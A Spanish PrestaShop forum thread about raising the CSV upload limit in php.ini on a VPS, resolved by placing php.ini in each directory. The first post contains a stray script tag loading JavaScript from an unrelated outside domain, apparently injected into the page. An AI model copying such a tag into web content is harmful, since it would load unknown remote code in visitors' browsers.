Jump to content

[SOLUCIONADO] El archivo cargado excede la talla máxima definida en php.ini (hosting VPS)


francesc

Recommended Posts

Hola,

 

Tengo un problema al intentar cargar un archivo csv de poco menos de 6MB para importar, esto me ocurre despues de pasar mi servidor a vps (curiosamente anteriormente en un hosting compartido esto no me daba problemas, pero excedia consumo de cpu a la hora de importar.

 

Me sale el siguiente error con ficheros mas grandes de 1MB.

 

"El archivo cargado excede la talla máxima definida en php.ini. Si la configuración del servidor lo permite, puede añadir una directiva en su .htaccess."

 

He intentado aumentar

upload_max_filesize

y

post_max_size

en php.ini tal como indican en este hilo:

http://www.prestashop.com/forums/topic/213933-%C2%BFtalla-maxima-definida-en-phpini-en-importacion-csv-solucionado/

pero nada

 

Alguna solución?

Gracias!

 

 

 

<script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

Edited by francesc (see edit history)
Link to comment
Share on other sites

Yo creo que los cambios que has realizado en el php.ini, no se han aplicado, si te creas un info.php:

<?php

// Muestra toda la información, por defecto INFO_ALL
phpinfo();

?>

que valor te aparecen en esos dos parametros que indicas ¿?

 

¿El php.ini donde lo has modificado? ¿En un sobrescrito del php.ini en tu tienda, en la carpetaadmin, o en un parametro global?

Link to comment
Share on other sites

Yo creo que los cambios que has realizado en el php.ini, no se han aplicado, si te creas un info.php:

<?php

// Muestra toda la información, por defecto INFO_ALL
phpinfo();

?>

que valor te aparecen en esos dos parametros que indicas ¿?

 

¿El php.ini donde lo has modificado? ¿En un sobrescrito del php.ini en tu tienda, en la carpetaadmin, o en un parametro global?

 

Gracias Rafael,

 

acabo de comprobar que si me ha aplicado los cambios, me indica los 128MB que he puesto, he sobreescrito el php.ini que tengo en public_html.

 

 

 

Link to comment
Share on other sites

Sigo con el problema...

 

intentando averiguar mas, he probado en una página de test con Prestashop 1.6.0.9 en el mismo hosting y me funciona bien, con lo que deduzco que es mi instalación 1.5.6.2 que tiene algún problema.

 

a ver si soluciono, porque de momento no quiero actualizar a la última versión.

 

Link to comment
Share on other sites

Contacté con mi proveedor de hosting y si bien haciendo los cambios tal como me dijeron ellos, seguía igual, ahora ya funciona correctamente y hasta parece que vaya mas rápido.

 

Estas son las indicaciones que me dieron:

 

Hemos subido al directorio public_html de su cuenta, un fichero php.ini con la configuración upload_max_filesize y post_max_size

Establezca la que usted desee y pruebe.

Ya tenía un fichero php.ini que hemos renombrado a php.ini_old

El fichero php.ini tan solo aplica su configuración en el directorio en que se encuentra, no en los subdirectorios, por lo que sería necesario que copiase este fichero, y que lo depositase en cualquier carpeta donde quiera que los scripts utilicen esta configuración.


Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...